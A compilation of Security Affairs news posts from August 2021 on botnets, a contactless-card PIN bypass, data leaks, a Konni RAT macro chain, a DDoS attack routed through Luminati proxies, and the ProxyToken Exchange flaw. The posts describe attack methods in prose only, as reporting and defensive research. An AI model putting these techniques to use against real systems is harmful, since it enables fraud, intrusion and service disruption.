🔒
There are new articles available, click to refresh the page.
Before yesterdaySecurity Affairs

Phorpiex botnet shuts down and authors put source code for sale

28 August 2021 at 08:48

Crooks behind the Phorpiex botnet have shut down their operations and put the source code for sale on the dark web.

The criminal organization behind the Phorpiex botnet have shut down their operations and put the source code of the bot for sale on a cybercrime forum in on a dark web.

The news was reported by The Record after that experts from security firm Cyjax noticed an ad posted by a crook that was involved in the botnet’s operation in the past.

The decision to sell the source code comes from the consideration that the two original authors of the malware have left the operations.

“As I no longer work and my friend has left the biz, I’m here to offer Trik (name from coder) / Phorpiex (name for AV firms) source for sell [sic],” the individual said today in a forum post spotted by British security firm Cyjax.” reads the ad published The Record.

The source code for the Phorpiex botnet is being sold on the darknet…👀 pic.twitter.com/GxBsnUacvh

— Cyjax (@Cyjax_Ltd) August 27, 2021

The main bot and all modules are written in C++, authors claim that the bot nor modules trigger any firewall / UAC prompts.

The Record, with the help of CheckPoint malware researcher Alexey Bukhteyev, confirmed that the ad is valid.

The researchers confirmed that the source code of the bot hasn’t been sold before

Bukhteyev pointed out that even if the C&C servers for the botnet are down, who will buy the code we will be able to set up new ones and take control over the previously infected systems.

At the time of this writing, it is not clear how many infected machines are still active.Bot works fine on 32 and 64 bit

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Phorpiex botnet)

The post Phorpiex botnet shuts down and authors put source code for sale appeared first on Security Affairs.

Boffins show PIN bypass attack Mastercard and Maestro contactless payments

28 August 2021 at 16:07

Boffins from the Swiss ETH Zurich university demonstrated PIN bypass attack on contactless cards from Mastercard and Maestro.

A group of researchers from the Swiss ETH Zurich university has discovered a vulnerability that allowed them to bypass PIN codes on contactless cards from Mastercard and Maestro.

Technically the researchers performed a Man-in-the-Middle (MitM) attack between a stolen card and the merchant’s Point-of-Sale (PoS) terminal.

In a real attack scenario, crooks could use a victim’s contactless card to make expensive purchases without knowing the card’s PIN.

“Concretely, the attacker fools the terminal into believing that the card being used is a Visa card and then applies the recent PIN bypass attack that we reported on Visa.” state the researchers. “We have built an Android application and successfully used it to carry out this attack for transactions with both Mastercard debit and credit cards, including a transaction for over 400 USD with a Maestro debit card. Finally, we extend our formal model of the EMV contactless protocol to machine-check fixes to the issues found.”

The attack was implemented using two Android smartphones (supporting NFC and running Android 4.4 KitKat or later) that were connected through a relay channel built using TCP/IP serverclient communication over WiFi. One phone runs an app in POS Emulator mode and the other phone runs the app developed by the researchers in Card Emulator mode. The device running in Card Emulator mode must support Android’s host-based card emulation so that the phone can launch the NFC payment service implemented by our app. The man-in-the-middle functionality runs on the POS Emulator device while the Card Emulator acts as the proxy for the relay channel.

The attack scenario is simple, the attackers place PoS emulator device near the card in order to trick the card into initiating a transaction and capture the transaction details, while the card emulator is used by crooks to feed modified transaction details to a real-life PoS terminal inside a store.

Maestro PIN bypass
Setup of the testing environment for our proof-ofconcept implementation, displaying the following devices: (1) SumUp Plus Card Reader, (2) mobile phone running the SumUp app and connected over Bluetooth to the SumUp reader, (3) Android phone running our app in Card Emulator mode, (4) Android phone running our app in POS Emulator mode, and (5) contactless card. Note that the device (2) is not part of the attacker’s equipment since in an actual store this device and (1) would be the payment terminal. In this scenario, the devices (3) and (4) would be the attacker’s equipment and (5) would be the victim’s card.

The same team of researchers last year devised a method to bypass PINs on Visa contactless payments and used this technique as part of this new attack, it was used to fools the terminal into believing that the card being used is a Visa instead of a Maestro.

The researchers successfully tested the attack against Visa Credit, Visa Debit, Visa Electron, and V Pay cards complete transactions of an amount above the PIN requirement limit for Swiss banks.

Below is one of the slides prepared by the researchers to show the PIN bypass attack:

Maestro PIN bypass 2

The PoS operator of the store could not detect the attack, from his perspective the customer is paying with his mobile payments app. In reality, the crook is using modified transaction details obtained from a stolen card.

Unlike the attack against VISA cards, the new PIN bypass attack tricks the PoS terminal into thinking that the incoming transaction comes from a Visa card instead of Mastercard/Maestro, the boffins modified the card’s legitimate Application Identifier (AID) with Visa’s AID: A0000000031010 to achieve this result.

Then experts used the 2020 Visa attack to make the payment without providing a PIN.

The researchers published a video PoC of the attack:

The researchers successfully tested this attack with Mastercard Credit and Maestro cards, but failed to execute the attack to pay with a Mastercard card in a Discover and a UnionPay transaction, as these two kernels are similar to the Visa kernel.

The happy ending is that Mastercard already addressed the issue early this year, but Visa has yet to fix the PIN bypass bug.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, PIN bypass)

The post Boffins show PIN bypass attack Mastercard and Maestro contactless payments appeared first on Security Affairs.

EskyFun data leak, over 1 million Android gamers impacted

28 August 2021 at 22:32

vpnMentor’s researchers reported that the Chinese mobile gaming company EskyFun suffered a data breach, over 1 million gamers impacted. 

vpnMentor’s researchers discovered that the Chinese mobile gaming company EskyFun suffered a data breach, information of over 1 million gamers were exposed on an unsecured server. 

EskyFun developed several Android games including Rainbow Story: Fantasy MMORPG, Adventure Story, The Legend of the Three Kingdoms, and Metamorph M. The games affected in the data leak were: Rainbow Story: Fantasy MMORPG (500,000+ downloads); Metamorph M (100,000+ downloads); Dynasty Heroes: Legends of Samkok (1,000,000+ downloads).

“EskyFun’s server was storing a rolling log of the previous 7 days’ user records from 3 separate games. At the end of each day, any data older than 7 days was automatically deleted to make room for fresh data.” reads the data breach published by the researchers. “As a result, our investigation focuses on just 7 days’ worth of data and any players exposed in that short window. However, despite only covering 7 days, the server still contained over 360 million records from players. This is an enormous amount of data collected from a few small, not well-known mobile games.”On Thursday, the team said that users of the following games were involved in the data leak: Rainbow Story: Fantasy MMORPG, Metamorph M, and Dynasty Heroes: Legends of Samkok. Together, they account for over 1.6 million downloads.  

The experts pointed out that the gaming firm uses “aggressive and deeply troubling tracking, analytics, and permissions settings” collecting an impressive amount of data when users install their games.

vpnMentor reported that the server was containing 134GB of data, exposed records include:

  • IP address
  • IMEI number
  • Mobile application package doing the tracking
  • Device screen size – whether a device is ‘rooted’*
  • Device model
  • Phone number (if any)
  • Platform (Android/iOS)
  • NetType (WiFi or cellular)
  • Events (open,login,level_up, etc)

EskyFun data leak

The experts attempted to report their discovery to the gaming, but received no response, for this reason they also contacted the Hong Kong CERT to secure the data. The good news is that EskyFun secured the server on July 28.

“If you’re a player on any of EskyFun’s games and are concerned about how this breach might impact you, contact the company directly to determine what steps it’s taking to protect your data.” concludes vpnMentor.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, data leak)

The post EskyFun data leak, over 1 million Android gamers impacted appeared first on Security Affairs.

Some Synology products impacted by recently disclosed OpenSSL flaws

29 August 2021 at 07:01

Taiwan vendor Synology announced that recently disclosed vulnerabilities (CVE-2021-3711 and CVE-2021-3712) in the OpenSSL impact some of its products.

Taiwanese company Synology revealed that the recently disclosed remote code execution (RCE) and denial-of-service (DoS) OpenSSL vulnerabilities (CVE-2021-3711 and CVE-2021-3712) impact some of its products.

“Multiple vulnerabilities allow remote attackers to conduct denial-of-service attack or possibly execute arbitrary code via a susceptible version of Synology DiskStation Manager (DSM), Synology Router Manager (SRM), VPN Plus Server or VPN Server.” reads the advisory published by the company.

The affected Synology products are:

Product Severity Fixed Release Availability
DSM 7.0 Important Ongoing
DSM 6.2 Moderate Ongoing
DSM UC Moderate Ongoing
SkyNAS Moderate Pending
VS960HD Moderate Pending
SRM 1.2 Moderate Ongoing
VPN Plus Server Important Ongoing
VPN Server Moderate Ongoing

The CVE-2021-3711 is a high-severity buffer overflow flaw that could allow an attacker to change an application’s behavior or cause the app to crash. The vulnerability ties the decryption of SM2 encrypted data, the changes depend on the targeted application and data it maintains (i.e. credentials) in the heap while the issue is exploited.

The CVE-2021-3712 is a medium-severity vulnerability that can be exploited by attackers to trigger a denial-of-service (DoS) condition. The flaw could also result in the disclosure of private memory contents (such as private keys, or sensitive plaintext).

Synology is expected to address both flaws with security updates, but it does not provide an estimated timeline for their release. Synology is not aware of attacks in the wild exploiting the above vulnerabilities.

Recently the vendor also published another advisory to warn of vulnerabilities in DiskStation Manager.

“Multiple vulnerabilities allow remote authenticated users to execute arbitrary commands, or remote attackers to write arbitrary files via a susceptible version of DiskStation Manager (DSM).” reads the advisory published by the company.

Below is the list of affected products:

Product Severity Fixed Release Availability
DSM 7.0 Important Ongoing
DSM 6.2 Important Upgrade to 6.2.4-25556-2 or above.
DSM UC Moderate Pending
SkyNAS Important Pending
VS960HD Moderate Pending

Early this month, the company PSIRT warned customers that the StealthWorker botnet is conducting brute-force attacks in an attempt to implant ransomware. Once compromised the device, threat actors employed it in a botnet used in attacks aimed at Linux systems, including Synology NAS.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, OpenSSL)

The post Some Synology products impacted by recently disclosed OpenSSL flaws appeared first on Security Affairs.

DDoS attacks target the Philippine human rights alliance Karapatan

29 August 2021 at 07:44

The Philippine human rights alliance Karapatan has suffered a massive and prolonged Distributed Denial of Service (DDoS) attack, Qurium organizations linked it to the local government.

For the past three weeks, the Philippine human rights alliance Karapatan has suffered a heavy and sustained DDoS attack. The attack comes only a month after the waves of DDoS attacks targeting the alternative media outlets Bulatlat and Altermidya, which Qurium could link to infrastructure controlled by the Philippine government and army.

The DDoS attacks are taking place amid the online solidarity campaign #StopTheKillingsPH co-hosted by Karapatan, which marks one year since human rights organizations and advocates across the world asserted the call to stop the killings in the Philippines and to prosecute President Rodrigo Duterte for his crimes against the Filipino people. The event also marks one year since the killing of human rights worker Zara Alvarez, that was an active member of Karapatan.

KARAPATAN DDOS ATTACK
High level overview of traffic to Karapatan during the attack

Karapatan Secretary General Cristina Palabay states: “These new series of cowardly cyber attacks against our website were obviously made to prevent the public from accessing our reports on the worsening state of human rights in the Philippines — and we know whose interests these attacks serve.”

In the spirit of changing the landscape of commercial denial-of-service mitigation services where forensics knowledge is kept private, Qurium has decided to disclose how we fingerprinted and mitigated the DDoS attacks with the hope that other organizations can learn from our experience, and in solidarity with human rights organization and independent media that do not have the resources to mitigate and attribute targeted attacks.

Qurium’s forensics report reveals that the attack is proxied via 30,000 bots distributed in Russia, Ukraine, Indonesia and China. The attacker has modified the attack strategy a number of times during the past weeks, which illustrates his dedication to the task. However, Karapatan has not suffered any downtime during the heavy attacks and the website operates as normal.

Qurium’s forensics report compiles the technical findings about the infrastructure and techniques used to launch the attacks against Karapatan.

Qurium forensics report:
Human rights alliance ‘Karapatan’ under long lasting DDoS attack

About the author: Qurium Media Foundation is a Swedish non-profit digital security solutions provider, supporting independent media and human rights organizations in repressive regimes. Learn more at qurium.org or Twitter.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking)

The post DDoS attacks target the Philippine human rights alliance Karapatan appeared first on Security Affairs.

Security Affairs newsletter Round 329

29 August 2021 at 08:19

A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

If you want to also receive for free the international press subscribe here.

EskyFun data leak, over 1 million Android gamers impacted
Boffins show PIN bypass attack Mastercard and Maestro contactless payments
Phorpiex botnet shuts down and authors put source code for sale
Atlassian released security patches to fix a critical flaw in Confluence
An RCE in Annke video surveillance product allows hacking the device
ChaosDB, a Critical Cosmos DB flaw affected thousands of Microsoft Azure Customers
The FBI issued a flash alert for Hive ransomware operations
Victims of Ragnarok ransomware can decrypt their files for free
B. Braun Infusomat pumps could be hacked to alter medication doses
CISA publishes malware analysis reports on samples targeting Pulse Secure devices
Cisco fixed a critical flaw in Cisco APIC for Nexus 9000 series switches
Kaseya fixed two of the three Kaseya Unitrends zero-days found in July
Personal Data and docs of Swiss town Rolle available on the dark web
VMware addressed 4 High-Severity flaws in vRealize Operations
F5 addressed a flaw in BIG-IP devices rated as critical severity under specific conditions
FIN8 group used a previously undetected Sardonic backdoor in a recent attack
ShinyHunters group claims to have data of 70M AT&T customers
Modified version of Android WhatsApp installs Triada Trojan
Samsung could use a TV Block feature to disable any of its TVs worldwide
CVE-2021-3711 in OpenSSL can allow to change an application’s behavior
New zero-click exploit used to target Bahraini activists’ iPhones with NSO spyware
FBI flash alert warns on OnePercent Group Ransomware attacks
Realtek SDK flaws exploited to deliver Mirai bot variant
CISA recommends immediately patch Exchange ProxyShell flaws
T-Mobile data breach could be worse than initially thought, 54 million customers impacted
 
Are you using a Sophos UTM appliance? Be sure it is up to date!
LPE zero-day flaw in Razer Synapse allows attackers to take over Windows PCs
Memorial Health System forced to cancel surgeries after ransomware attack
Google discloses unpatched Microsoft WFP Default Rules AppContainer Bypass EoP

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

If you want to also receive for free the international press subscribe here.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

The post Security Affairs newsletter Round 329 appeared first on Security Affairs.

1 GB of data belonging to Puma available on Marketo

29 August 2021 at 14:58

The name of the sportswear manufacturer Puma appeared on the dark web marketplace of stolen data Marketo, threat actors claim to have stolen 1 GB of data from the company.

The emerging underground marketplace of stolen data ‘Marketo’ available in TOR network announced the publication of data presumably stolen from sportswear manufacturer Puma. 

Marketo Puma

The ad on Marketo claims to have about 1GB of data stolen from the company that are now auctioned to the highest bidder. 

Cybercriminals behind ‘Marketo’ claim to be operators of an organized ‘marketplace of stolen data’ and not as a typical ransomware group distributing malicious code to disrupt IT operations by blocking the network of the victim and by encrypting available files on various data storage. 

One of the unique features provided by ‘Marketo’ – the ability to ‘bid’ on stolen data, which obviously creates competition between parties interested in data acquisition including the end victim.

At the time of this writing, 157 threat actors have made their bid to buy the sensitive data.

Some of the files stolen form Puma were published on Marketo, most of them contains source codes of internal management applications potentially linked to the company’s Product Management Portal. 

This data could be used by threat actors to orchestrate a more sophisticated attack against the company.

Experts that have analyzed the code have found evidence that the files of the organizations might have been stolen as result of a data breach of a third-party software provider.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, FIN8)

The post 1 GB of data belonging to Puma available on Marketo appeared first on Security Affairs.

New variant of Konni RAT used in a campaign that targeted Russia

30 August 2021 at 06:50

So far, Konni RAT has managed to evade detection as only 3 security solutions on VirusTotal were able to detect the malware.

Researchers from Malwarebytes Labs spotted an ongoing malware campaign that is targeing Russia with the Konni RAT.

Security researchers at Malwarebytes Labs have uncovered an ongoing malware campaign that is mainly targeting Russia with the Konni RAT.

The KONNI RAT was first spotted by Cisco Talos researchers in 2017, it has been undetected since 2014 and was employed in highly targeted attacks. The RAT was able to avoid detection due to continuous evolution, it is able of executing arbitrary code on the target systems and stealing data.

The Konni RAT has been attributed to North Korea-linked threat actors tracked as Thallium and APT37.

Malwarebytes experts discovered two weaponized documents written in the Russian language, one using the trade and economic issues between Russia and the Korean Peninsula as a lure. The second document used a meeting of the intergovernmental Russian-Mongolian commission as a lure.

Upon enabling macro it executes the infection chain will start deploying a new variant of Konni RAT that is heavily obfuscated.

“These malicious documents used by Konni APT have been weaponized with the same simple but clever macro. It just uses a Shell function to execute a one-liner cmd command. This one liner command gets the current active document as input and looks for the “^var” string using findstr and then writes the content of the line staring from “var” into y.js. At the end it calls Wscript Shell function to executes the Java Script file (y.js).” reads the analysis published by Malwarebytes. “The clever part is that the actor tried to hide its malicious JS which is the start of its main activities at the end of the document content and did not put it directly into the macro to avoid being detected by AV products as well as hiding its main intent from them.”

Konni RAT

Malware researchers noticed multiple differences between this campaign and previous ones orchestrated by the North Korea-linked APT group, including:

  • The macros are different. In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content.
  • In the new campaign JavaScript files have been used to execute batch and PowerShell files.
  • The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file.
  • The new campaign has used two different UAC bypass techniques based on the victim’s OS while in the old one the actor only used the Token Impersonation technique.
  • In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. Also, its configuration is encrypted and is not base64 encoded anymore. It also does not use FTP for exfiltration.

Experts observed infections also in other countries, including Japan, Nepal, Mongolia, and Vietnam.

Additional details, including Indicators of Compromise (IoC), are reported in the analysis published by Malwarebytes.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Konni RAT)

The post New variant of Konni RAT used in a campaign that targeted Russia appeared first on Security Affairs.

Boston Public Library discloses cyberattack

30 August 2021 at 07:45

The Boston Public Library was victim of a cyberattack that crippled its computer network, the library revealed in a statement Friday.

The Boston Public Library announced on Friday that it was hit by a cyberattack that compromised its computer network. The affected systems were taken offline to prevent the threat from spreading. At the time of the announcement, the library said that there is no evidence that sensitive employee or patron data has been compromised.

The Boston Public Library library is the oldest large municipal library in the nation.

“On Wednesday morning, 8/25, the Boston Public Library experienced a systemwide technical outage due to a cybersecurity attack, pausing public computer and public printing services, as well as some online resources. Affected systems were taken offline immediately, and proactive steps were taken to isolate the problem and shutdown network communication. There is currently no evidence that sensitive employee or patron data has been disclosed.” reads the statement published by BPL.

The library reported the incident to law enforcement and is working with the Mayor’s Department of Innovation and Technology to mitigate the cyberattack. All locations will remain open, patrons will still be able to check out books, and some online services remain operational. 

“We apologize for any inconvenience this outage may have caused patrons,” said Kurt Mansperger, Chief Technology Officer of the BPL. “Thank you for your patience as our team and law enforcement officials work to restore our digital services and protect the library from future attacks.” concludes the statement.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking)

The post Boston Public Library discloses cyberattack appeared first on Security Affairs.

CISA urges enterprises to fix Microsoft Azure Cosmos DB flaw

30 August 2021 at 13:11

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an alert urging enterprises to address the recently disclosed vulnerability in Microsoft Azure Cosmos DB.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an alert urging organizations to address the recently disclosed vulnerability in Microsoft Azure Cosmos DB (aka ChaosDB) as soon as possible.

Last week, researchers from Cloud security company Wiz disclosed technical details of a now-fixed Azure Cosmos database vulnerability, dubbed ChaosDB, that could have been potentially exploited by attackers to gain full admin access to other customers’ database instances without any authorization. The flaw was trivial to exploit and impacts thousands of organizations worldwide.

#ChaosDB is an unprecedented critical vulnerability in the Azure cloud platform that allows for remote account takeover of Azure’s flagship database – Cosmos DB. The vulnerability, which was disclosed to Microsoft in August 2021 by Wiz Research Team, gives any Azure user full admin access (read, write, delete) to another customers Cosmos DB instances without authorization.” reads the post published by the security firm,

Azure Cosmos Darabase is Microsoft’s globally-distributed multi-model database service.

Wiz experts identified an exploit that leverages a chain of vulnerabilities in the Jupyter Notebook feature of Cosmos DB that enables an attacker to obtain the credentials corresponding to the target Cosmos DB account, including the Primary Key. These credentials allow users to view, modify, and delete data in the target Cosmos DB account via multiple channels.

chaos db Cosmos DB Azure

Microsoft acknowledged the issue and said that it is not aware of attacks exploiting the vulnerability to access customer data.

“This vulnerability only affects a subset of customers who had the Jupyter Notebook feature enabled. Notifications have been sent to all customers that could be potentially affected due to researcher activity, advising they regenerate their primary read-write key. Other keys including the secondary read-write key, primary read-only key, and secondary read-only key were not vulnerable.” reads the post published by Microsoft which also includes instructions on how to regenerate the user’s primary read-write key. If you did not receive an email or in-portal notification, there is no evidence any other external parties had access to your primary read-write account key.  If you have diagnostic logs enabled, you can also review the logs for unusual IP addresses.  Our suggestion is to enable Diagnostic Logging and Azure Defender where available and periodically rotate your keys.”

Now CISA urges Azure Cosmos DB customers to regenerate their certificate keys and to review Microsoft’s guidance on how to Secure access to data in

“CISA is aware of a misconfiguration vulnerability in Microsoft’s Azure Cosmos DB that may have exposed customer data. Although the misconfiguration appears to have been fixed within the Azure cloud, CISA strongly encourages Azure Cosmos DB customers to roll and regenerate their certificate keys and to review Microsoft’s guidance on how to Secure access to data in Azure Cosmos DB.” reads the advisory published by CISA.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Cosmos DB)

The post CISA urges enterprises to fix Microsoft Azure Cosmos DB flaw appeared first on Security Affairs.

ISRAELI FIRM ‘BRIGHT DATA’ (LUMINATI NETWORKS) ENABLED THE ATTACKS AGAINST KARAPATAN

30 August 2021 at 13:38

Who is behind the massive and prolonged Distributed Denial of Service (DDoS) attack that hit the Philippine human rights alliance Karapatan?

The 25 days long DDoS attack against the website of Karapatan was launched by almost 30.000 IP addresses, whereas one third of the addresses originated from devices that there were not running “Open Proxies” or “Tor exits”. Identifying this mysterious part of the botnet turned to be a fascinating research and a digital forensics challenge. The traces lead us to an Israeli firm offering access to millions of proxies in mobile operators, data centers and residential buildings – a perfect infrastructure to hide the source of DDoS attacks.

This is Part II of our ongoing research on the DDoS attack against Karapatan. For background information, please read the report “Human rights alliance ‘Karapatan’ under long lasting DDoS attack“.


Finding patterns – identifying clusters

Once we were able to flag the addresses associated with the Tor network and those that came from publicly visible proxy services, we classified the 8,000 “unknown” IP addresses in pools based on country, operator, time and attack cluster. We defined an “attack cluster” as the group of IP addresses that flooded the website within one hour period with similar requests.

A few patterns showed quickly, the first one was that most of the addresses came from a number of mobile providers in Russia and Ukraine, such as MTS, MegaFon, T2 Mobile, PVimpelCom and Kyivstar.

We also noticed that the IPs were rotating every hour, and blocks of 50 new IPs were launching the same query attack at the same time.

During an attack of this nature, it is difficult to find clear patterns without fast data and log processing and ad-hoc tools but our DNS servers were clearly recording these spikes of DNS updates every time the botnet was renewing IP addresses. We love patterns and here we found a clear one!

The first finding was that the attackers kept using their “CC-Attack modified python script” generating GET and POST floods to the /resources section of karapatan.org but instead of using open proxies and the Tor network, they were proxing the attack traffic via a “private proxy network” geo-located in a few countries.

Unexpected name resolution requests

What was strange, was that while the attack was coming from Russia and Ukraine, many of these periodical DNS resolutions were instead coming from very different providers, in specific AS20473 Choopa and AS62567 Digital Ocean. So whatever that was flooding us was resolving the domain karapatan.org from inside of these providers.

Waves of attacks strongly geo-located using very few providers

By the second week of August 2021, we knew that the private proxy network inside of the Mobile Operators in Russia and Ukraine was speeding up their connections by making the name resolution of the targeted domain elsewhere.

Luminati Proxies as a DDoS botnet

A review of hundreds of servers in these DNS infrastructures revealed hundreds of proxies with the banner:

< HTTP/1.1 407 Proxy Authentication Required
< X-Luminati-Error: Proxy Authentication Required
< Proxy-Authenticate: Basic realm="Luminati"
< Date: Sat, 21 Aug 2021 10:49:31 GMT
< Connection: keep-alive
< Keep-Alive: timeout=5
< Transfer-Encoding: chunked

Who is Bright Data (Luminati Networks)?

Bright Data (formerly Luminati) with headquarters in Netanya, Israel, offers access to millions of proxies in mobile operators, data centers and residential buildings and promises to “unlock any website & collect accurate data to make data-driven business decisions”. Their business practices have long been criticized for their use of mobile VPNs and other “backdoored” Mobile Apps to gain access to residential and mobile devices.

“Never get blocked” sales presentation from Bright Data/Luminati

Once we discovered how this “super proxies” infrastructures looked like, we could search for them in Censys and later on discover the locations of thousands of them by looking into their associated domains: lum-superproxy.io and l-cdn.com

We knew that the super-proxies had ports 7547, 5000-44818 open. A simple query to Censys using the 16993.https.get.headers.proxy_authenticate=Luminati or “X-Luminati-Error” in Shodan was enough to find the main locations of the super-proxies.

Luminati documentation was also enlightening as it was consistent with the DNS resolution anomaly.

Attacker connected to Luminati’s installed Proxy Manager from CC-Attack to flood Karapatan.org
Expert documentation from Luminati explaining the “resolve DNS at super proxy” feature

Thousands of rotating IPs flooding the website

The traffic patterns we recorded were consistent with new pools of IPs rotating every hour. At the beginning of our research, we speculated that this behavior could be the result of a “pay as you go” stress testing service that allowed a maximum of one hour attack time. After several days monitoring the website we could determine that the traffic patterns were the result of Luminati automatically rotating their residential and mobile proxies in an hour basis.

During weeks, Luminati was flooding the website with no less than 100 new IPs ever hour and thousands of requests per second.

Number of Luminati IPs detected per hour in the last ten days of the attack

How much does the attack traffic cost?

Not surprisingly, this was the first time Qurium saw this infrastructure used for Denial of Service attacks as the Luminati traffic is far from cheap. One GB of traffic ranges between 26-35 USD for Mobile Proxies and 10-15 USD for Residential Proxies.

Only during the ten day period 10th-20th August 2021, we estimated close to 10 TB (10.000 GB) of attack traffic coming from Luminati. Using the “Plus” Package of Luminati, the attack sums up to the crazy figure of 260,000 USD for that 10-day period only.

It is difficult to believe that an attacker launching billions of requests flooding one single website has been undetected by Luminati for weeks. Only “Bright Data / Luminati Networks” will be able to bring light to this case and explain to the general public how this “business deal” was arranged.

Luminati pricing model for monthly subscriptions.

Bright Data response to the abuse report

The 21st of August 2021, an abuse report was sent to Bright Data (Luminati Networks) about the attack. A sample of the traffic logs of the floods was shared with the company, the traffic logs included 1556 IP addresses from 68 networks of MTS and Megafon.

Some of the prefixes we shared contain more than 50 IPs engaged in the floodings.

Sample of the flood activity of prefix 188.170.83.0/24 (56 IPs) during the attack 10-19th August 2021)
Bright_Data_IPs Network
56 188.170.83.0/24
55 188.170.75.0/24
54 188.170.74.0/24
49 188.170.86.0/24
49 188.170.81.0/24
49 188.170.80.0/24
48 188.170.77.0/24
47 188.170.76.0/24
47 188.170.73.0/24
46 188.170.84.0/24
42 188.170.87.0/24
42 188.170.82.0/24
38 188.170.78.0/24
37 188.170.72.0/24
36 188.170.79.0/24
35 188.170.85.0/24
28 95.153.129.0/24
28 213.87.157.0/24

After some email exchanges, where Bright Data did not request more evidence, we received this fascinating explanation on August 24th.

“The IPs from the list you have attached (attaching it again) belong to Bright Data, however we did not find any of them in the requests that were sent to the reported domain. Due to the lack of findings, we keep the reported domain blocked for all of our customers, and from all of our networks, therefore we expect no requests will be sent to it through our network. Thank you for your report and hope we managed to help you sufficiently”.

As in other cases when we have traced back attack infrastructure, the email exchange finish with the common “No worries. We did not do it. It will not happen again”:

(…) we left the domain blocked so no traffic to karapatan.org will be going through our network. That way we can ensure you that no future abuse could be generated from our networks.

Original Post @ https://www.qurium.org/alerts/philippines/israeli-firm-bright-data-luminati-networks-enabled-the-attacks-against-karapatan/

About the author: Qurium Media Foundation is a Swedish non-profit digital security solutions provider, supporting independent media and human rights organizations in repressive regimes. Learn more at qurium.org or Twitter.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, DDoS)

The post ISRAELI FIRM ‘BRIGHT DATA’ (LUMINATI NETWORKS) ENABLED THE ATTACKS AGAINST KARAPATAN appeared first on Security Affairs.

US DoJ announces the creation of Cyber Fellowship Program

30 August 2021 at 14:40

The US DoJ announced a new Cyber Fellowship program for training prosecutors and attorneys on cybersecurity.

The US DoJ announced a new Cyber Fellowship program for training selected prosecutors and attorneys on cyber threat and threat actors.

The course is coordinated through the Criminal Division’s Computer Crime and Intellectual Property Section.

The training aims at personnel from various departments which are focused on cyber defense, such as the Criminal Division or the U.S. Attorneys’ Offices.

The training will provide details about cybersecurity-related cases such as operations of state-sponsored threat actors and cybercrime organizations and related TTPs.

“Today, Deputy Attorney General Lisa Monaco announced the creation of a new Cyber Fellowship program, designed to develop a new generation of prosecutors and attorneys equipped to handle emerging national security threats.” reads the announcement published by DoJ. “Fellows can expect to investigate and prosecute state-sponsored cyber threats; transnational criminal groups; infrastructure and ransomware attacks; and the use of cryptocurrency and money laundering to finance and profit from cyber-based crimes.”

The program will require all trainees to secure a Top Secret security clearance and commit for the entire duration of the program (three years). The training will be held in the Washington, D.C. area.

“As we have witnessed this past year, cyber threats pose a significant and increasing risk to our national security, our economic security, and our personal security,” said Deputy Attorney General Monaco. “We need to develop the next generation of prosecutors with the training and experience necessary to combat the next generation of cyber threats. This Fellowship gives attorneys a unique opportunity to gain the well-rounded experience they need to tackle the full range of those threats.”

The DoJ also states the trainees may be extended or converted to permanent positions without further competition. The participants may also reapply to the Honors Program in a subsequent year or may apply for permanent positions within the department.

The deadline for prosecutors and attorneys to take part in the Cyber Fellowship program is September 8.

Personnel interested into the program could apply it through the Justice Department’s Honors Program application portal. Applicants to this year’s Honors Program should indicate if they would like to be considered for the Cyber Fellowship.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, FIN8)

The post US DoJ announces the creation of Cyber Fellowship Program appeared first on Security Affairs.

Microsoft Exchange ProxyToken flaw can allow attackers to read your emails

31 August 2021 at 10:16

ProxyToken is a serious vulnerability in Microsoft Exchange Server that could allow unauthentication attackers to access emails from a target account.

Technical details of a serious vulnerability in the Microsoft Exchange Server, dubbed ProxyToken (CVE-2021-33766), were publicly disclosed. The issue could be exploited by an unauthenticated attacker to access emails from a target account.

An attacker can trigger the flaw by sending a specially crafted request to web services within the Exchange Control Panel (ECP) application and access messages from a victim’s inbox.

An attacker could exploit the issue to access mailbox settings and set up an email forwarding rule in order to receive the messages sent to the victims.

As a pre-requisite for the attack, the attacker needs to have an account on the same Exchange server as the victim.

“This vulnerability allows remote attackers to disclose sensitive information on affected installations of Microsoft Exchange Server. Authentication is not required to exploit this vulnerability.” reads the advisory published Zero-Day Initiative (ZDI). “The specific flaw exists within the authentication of requests to web services within the ecp web application. By issuing a crafted request, an attacker can bypass authentication. An attacker can leverage this vulnerability to disclose information from the server.”

The vulnerability was discovered by Le Xuan Tuyen from the Information Security Center of Vietnam Posts and Telecommunications Group (VNPT-ISC) in March.

The experts noticed that Outlook Web Access and Exchange Control Panel pass authentication requests to the Exchange Back End.

When the “Delegated Authentication” feature is active in Microsoft Exchange installs, the front-end forwards the requests that need authentication to the backend. These requests include a ‘SecurityToken’ cookie that when is present in a request within ‘/ecp’, delegates the authentication process to the backend.

“Thus, for requests within /ecp, if the front end finds a non-empty cookie named SecurityToken, it delegates authentication to the back end. Code on the back end that examines and validates the SecurityToken cookie is found in the class Microsoft.Exchange.Configuration.DelegatedAuthentication.DelegatedAuthenticationModule” reads the analysis published by ZDI. “As you can see, in a default configuration of the product, a element appears, so that the module DelegatedAuthModule will not be loaded at all for the back-end ECP site.”

